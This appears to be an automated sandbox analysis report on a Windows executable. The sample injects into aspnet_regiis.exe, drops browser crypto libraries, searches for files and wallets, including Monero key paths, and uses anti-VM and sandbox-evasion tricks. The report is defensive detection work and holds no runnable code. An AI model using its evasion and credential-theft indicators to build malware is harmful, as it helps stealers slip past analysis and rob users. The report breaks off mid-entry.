Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: mozglue.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ntvdm64.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: dui70.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: duser.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: windows.ui.immersive.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: bcp47mrm.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: uianimation.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: d3d11.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: dxcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: dcomp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: dwmapi.dll	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: file.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: file.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: mozglue.pdbP source: aspnet_regiis.exe, 00000003.00000002.2680382031.000000006CADD000.00000002.00000001.01000000.0000000B.sdmp, aspnet_regiis.exe, 00000003.00000002.2665588204.0000000028269000.00000004.00000020.00020000.00000000.sdmp, mozglue.dll.3.dr
Source:	Binary string: freebl3.pdb source: aspnet_regiis.exe, 00000003.00000002.2662944978.00000000222FE000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.3.dr
Source:	Binary string: freebl3.pdbp source: aspnet_regiis.exe, 00000003.00000002.2662944978.00000000222FE000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.3.dr
Source:	Binary string: nss3.pdb@ source: aspnet_regiis.exe, 00000003.00000002.2675094445.0000000040028000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2680720904.000000006CC9F000.00000002.00000001.01000000.0000000A.sdmp, nss3.dll.3.dr
Source:	Binary string: softokn3.pdb@ source: aspnet_regiis.exe, 00000003.00000002.2670689441.000000003414C000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: aspnet_regiis.exe, 00000003.00000002.2672994085.000000003A0B1000.00000004.00000020.00020000.00000000.sdmp, vcruntime140.dll.3.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: aspnet_regiis.exe, 00000003.00000002.2668214599.000000002E1D7000.00000004.00000020.00020000.00000000.sdmp, msvcp140.dll.3.dr
Source:	Binary string: nss3.pdb source: aspnet_regiis.exe, 00000003.00000002.2675094445.0000000040028000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2680720904.000000006CC9F000.00000002.00000001.01000000.0000000A.sdmp, nss3.dll.3.dr
Source:	Binary string: mozglue.pdb source: aspnet_regiis.exe, 00000003.00000002.2680382031.000000006CADD000.00000002.00000001.01000000.0000000B.sdmp, aspnet_regiis.exe, 00000003.00000002.2665588204.0000000028269000.00000004.00000020.00020000.00000000.sdmp, mozglue.dll.3.dr
Source:	Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: aspnet_regiis.exe, 00000003.00000002.2659303153.000000001BE1B000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2662427008.0000000021D88000.00000002.00001000.00020000.00000000.sdmp
Source:	Binary string: softokn3.pdb source: aspnet_regiis.exe, 00000003.00000002.2670689441.000000003414C000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\file.exe

Unpacked PE file: 0.2.file.exe.be0000.0.unpack JO_E58:EW;.text:ER;.rsrc:R;.reloc:R;Unknown_Section4:ER; vs Unknown_Section0:EW;Unknown_Section1:ER;Unknown_Section2:R;Unknown_Section3:R;Unknown_Section4:ER;

Contains functionality to dynamically determine API calls

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Code function: 3_2_02A18950 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

3_2_02A18950

PE file contains sections with non-standard names

Source: file.exe	Static PE information: section name: JO_E58
Source: file.exe	Static PE information: section name:
Source: mozglue.dll.3.dr	Static PE information: section name: .00cfg
Source: msvcp140.dll.3.dr	Static PE information: section name: .didat
Source: softokn3.dll.3.dr	Static PE information: section name: .00cfg
Source: nss3.dll.3.dr	Static PE information: section name: .00cfg
Source: freebl3.dll.3.dr	Static PE information: section name: .00cfg

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C342CD push esp; ret	0_2_00C34316
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C340DE pushfd ; ret	0_2_00C340E2
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C31EAB push esp; iretd	0_2_00C31EFF
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6D5DA421 push ecx; ret	0_2_6D5DA434
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_02A2F142 push ecx; ret	3_2_02A2F155
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_02A1DDB5 push ecx; ret	3_2_02A1DDC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_02A22D3B push esi; ret	3_2_02A22D3D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CA9B536 push ecx; ret	3_2_6CA9B549

Source: file.exe

Static PE information: section name: JO_E58 entropy: 7.9994803282182785

Drops PE files

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Roaming\msvcp110.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Drops PE files to the application program directory (C:\ProgramData)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Extensive use of GetProcAddress (often used to hide API calls)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

3_2_02A18950

Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: 0.2.file.exe.6d5e2000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.6d5e2000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.aspnet_regiis.exe.2a00000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.6d5b0000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1439234839.000000006D5E2000.00000004.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 7116, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: aspnet_regiis.exe PID: 1420, type: MEMORYSTR

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: aspnet_regiis.exe	Binary or memory string: DIR_WATCH.DLL
Source: aspnet_regiis.exe, 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmp	Binary or memory string: INMPM20IXQUGN9:-?5(\C!7%{->^WALLET_PATHSOFTWARE\MONERO-PROJECT\MONERO-CORE.KEYS\MONERO\WALLET.KEYS\\\.\\...\\\\\\\\\\\\HAL9THJOHNDOEDISPLAYAVGHOOKX.DLLAVGHOOKA.DLLSNXHK.DLLSBIEDLL.DLLAPI_LOG.DLLDIR_WATCH.DLLPSTOREC.DLLVMCHECK.DLLWPESPY.DLLCMDVRT32.DLLCMDVRT64.DLL20:41:3120:41:3120:41:3120:41:3120:41:3120:41:31DELAYS.TMP%S%SNTDLL.DLL
Source: aspnet_regiis.exe	Binary or memory string: SBIEDLL.DLL
Source: aspnet_regiis.exe	Binary or memory string: API_LOG.DLL

Allocates memory with a write watch (potentially for evading sandboxes)

Source: C:\Users\user\Desktop\file.exe	Memory allocated: 2D60000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory allocated: 2EB0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory allocated: 4EB0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory allocated: 5540000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory allocated: 6540000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory allocated: 6670000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory allocated: 7670000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory allocated: 7A20000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory allocated: 8A20000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory allocated: 9A20000 memory reserve \| memory write watch	Jump to behavior

Contains functionality to detect sandboxes (mouse cursor move detection)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Code function: OpenInputDesktop,SetThreadDesktop,GetCursorPos,GetCursorPos,Sleep,Sleep,GetCursorPos,Sleep,Sleep,GetCursorPos,

3_2_02A0180D

Contains long sleeps (>= 3 min)

Source: C:\Users\user\Desktop\file.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Window / User API: threadDelayed 831			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Window / User API: threadDelayed 1900			Jump to behavior

Found dropped PE file which has not been started or loaded

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Dropped PE file which has not been started: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\msvcp110.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Dropped PE file which has not been started: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Dropped PE file which has not been started: C:\ProgramData\softokn3.dll	Jump to dropped file

Found large amount of non-executed APIs

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

API coverage: 9.1 %

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Users\user\Desktop\file.exe TID: 3980

Thread sleep time: -922337203685477s >= -30000s

Jump to behavior

Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Code function: 3_2_02A10DDB GetKeyboardLayoutList followed by cmp: cmp eax, ebx and CTI: jbe 02A10EEEh

3_2_02A10DDB

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6D5D38ED FindFirstFileExW,	0_2_6D5D38ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_02A15FD1 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	3_2_02A15FD1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_02A0BF4D FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,	3_2_02A0BF4D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_02A14CC8 wsprintfA,FindFirstFileA,_memset,_memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,_memset,lstrcat,strtok_s,strtok_s,_memset,lstrcat,strtok_s,PathMatchSpecA,DeleteFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,strtok_s,strtok_s,FindNextFileA,FindClose,	3_2_02A14CC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_02A1543D wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	3_2_02A1543D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_02A01D80 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	3_2_02A01D80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_02A0D5C6 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	3_2_02A0D5C6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_02A0B5DF FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	3_2_02A0B5DF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_02A09D1C FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	3_2_02A09D1C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_02A15B0B GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,	3_2_02A15B0B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_02A0B93F FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	3_2_02A0B93F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_02A0CD37 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	3_2_02A0CD37

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Code function: 3_2_02A15142 GetLogicalDriveStringsA,_memset,GetDriveTypeA,lstrcpy,lstrcpy,lstrcpy,lstrlen,

3_2_02A15142

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

